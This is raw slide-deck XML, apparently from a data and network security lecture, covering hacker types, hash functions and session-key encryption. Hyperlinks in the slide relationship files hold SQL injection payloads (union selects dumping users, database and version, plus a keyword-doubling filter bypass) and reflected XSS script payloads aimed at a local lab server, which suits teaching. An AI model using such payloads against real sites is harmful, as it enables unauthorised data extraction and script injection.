          <a:latin typeface="Georgia" pitchFamily="18" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:srgbClr val="BC4B2C"/>
          </a:solidFill>
          <a:latin typeface="Georgia" pitchFamily="18" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:srgbClr val="BC4B2C"/>
          </a:solidFill>
          <a:latin typeface="Georgia" pitchFamily="18" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:srgbClr val="BC4B2C"/>
          </a:solidFill>
          <a:latin typeface="Georgia" pitchFamily="18" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="105000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="800000"/>
        </a:buClr>
        <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
        <a:buChar char="à"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:srgbClr val="004666"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="105000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="800000"/>
        </a:buClr>
        <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
        <a:buChar char="à"/>
        <a:defRPr sz="2200">
          <a:solidFill>
            <a:srgbClr val="004666"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="105000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="800000"/>
        </a:buClr>
        <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
        <a:buChar char="à"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:srgbClr val="004666"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="105000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="800000"/>
        </a:buClr>
        <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
        <a:buChar char="à"/>
        <a:defRPr>
          <a:solidFill>
            <a:srgbClr val="004666"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="105000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="800000"/>
        </a:buClr>
        <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
        <a:buChar char="à"/>
        <a:defRPr sz="1600">
          <a:solidFill>
            <a:srgbClr val="004666"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514600" indent="-228600" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="105000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="800000"/>
        </a:buClr>
        <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
        <a:buChar char="à"/>
        <a:defRPr sz="1600">
          <a:solidFill>
            <a:srgbClr val="004666"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2971800" indent="-228600" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="105000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="800000"/>
        </a:buClr>
        <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
        <a:buChar char="à"/>
        <a:defRPr sz="1600">
          <a:solidFill>
            <a:srgbClr val="004666"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3429000" indent="-228600" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="105000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="800000"/>
        </a:buClr>
        <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
        <a:buChar char="à"/>
        <a:defRPr sz="1600">
          <a:solidFill>
            <a:srgbClr val="004666"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3886200" indent="-228600" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="105000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="800000"/>
        </a:buClr>
        <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
        <a:buChar char="à"/>
        <a:defRPr sz="1600">
          <a:solidFill>
            <a:srgbClr val="0046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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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10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0.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.wmf"/></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10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3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jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.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1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1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13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www.google.com/imgres?imgurl=http://www.pcbanker.com/images/sid700a.gif&amp;imgrefurl=http://www.pcbanker.com/CustServ/securIDinfo.asp&amp;h=237&amp;w=350&amp;sz=16&amp;tbnid=b2vurGzjJyXLAM::&amp;tbnh=81&amp;tbnw=120&amp;prev=/images?q=picture+of+securid+token&amp;usg=__SOf7rHTmudjeKkGF7l5IeFEsFZs=&amp;ei=UrzWSaitKaXglQe_u9HgDA&amp;sa=X&amp;oi=image_result&amp;resnum=1&amp;ct=image" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3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1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7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.21/compiler/sql/id.php?id=3-1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.21/compiler/sql/id.php?id=1" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout38.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.67.128/compiler/sql/id.php?id=1+union%20select+1,2,database()" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.21/compiler/sql/id.php?id=1+union+Select+*+from+users" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide148.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.21/compiler/sql/id1.php?id=1+union+select+*+from+users" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.67.128/compiler/sql/id.php?id=1+union%20select%201,2,concat(user(),%22:%22,database(),%22:%22,version())" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout38.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.21/compiler/sql/id1.php?id=1+union+selselectect+*+from+users" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.21/compiler/sql/id1.php?id=1+union+Select+*+from+users" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide149.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.67.128/compiler/sql/sql3.php?id=1" TargetMode="Externa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hyperlink" Target="http://192.168.1.21/compiler/rexec/index.php" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.67.128/compiler/rexec/index.php" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout38.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.21/compiler/xss/example2.php?name=%3cscript%3ealert(1);%3c/script" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.21/compiler/xss/example1.php?name=%3cscript%3ealert(1);%3c/script" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.67.128/compiler/xss/example1.php?name=ahmed"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2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.21/compiler/sql/id.php?id=1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.67.128/compiler/sql/id.php?id=1" TargetMode="Externa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8.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40.xml"/><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5800" y="1197000"/>
            <a:ext cx="7772040" cy="1469520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Data and Network security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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919949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Types of Hackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139"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Script kiddy </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 user who lacks the skills of a typical hacker. Rather, he downloads hacking utilities and uses those utilities to launch attacks, rather than writing his own programs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Hacktivist</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 hacker with political motivations, such as someone who defaces the website of a political candidate.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Phreaker</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 phreaker is a hacker of a telecommunications system. </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Algorithms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Message digests are summaries of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>message’s content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Impossible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, to derive a message from an ideal hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Very unlikely that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>two messages will produce the same hash value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Used to ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> of messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Common Hash Algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Digest 5 (MD5)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Secure Hash Algorithm (SHA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Hashed Message Authentication Code (HMAC)</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760" y="3896624"/>
            <a:ext cx="2038350" cy="296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5910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Algorithms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Variable length of input, and fixed length of output.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Collision free.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avalanche effect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Irreversible.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3506121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Cryptographic Hashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Password veriﬁcation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Message authenticity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File integrity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28288914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Encryption Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2743200" y="1600200"/>
            <a:ext cx="5029200" cy="2667000"/>
            <a:chOff x="1219200" y="1447800"/>
            <a:chExt cx="6629400" cy="3962400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Round Same Side Corner Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1219200" y="1447800"/>
              <a:ext cx="6629400" cy="3962400"/>
            </a:xfrm>
            <a:prstGeom prst="round2SameRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="82124" tIns="41061" rIns="82124" bIns="41061" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="814388" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Message and key will be sent to the receiver</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4594861" y="2362200"/>
              <a:ext cx="1905000" cy="2641600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="82124" tIns="41061" rIns="82124" bIns="41061" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="814388" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Message</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" defTabSz="814388" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" defTabSz="814388" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" defTabSz="814388" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" defTabSz="814388" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" defTabSz="814388" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Encrypted with </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>session key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1828800" y="2362200"/>
              <a:ext cx="2368826" cy="2362200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="82124" tIns="41061" rIns="82124" bIns="41061" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="814388" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Session Key</a:t>
              </a:r>
            </a:p>
            <a:p>
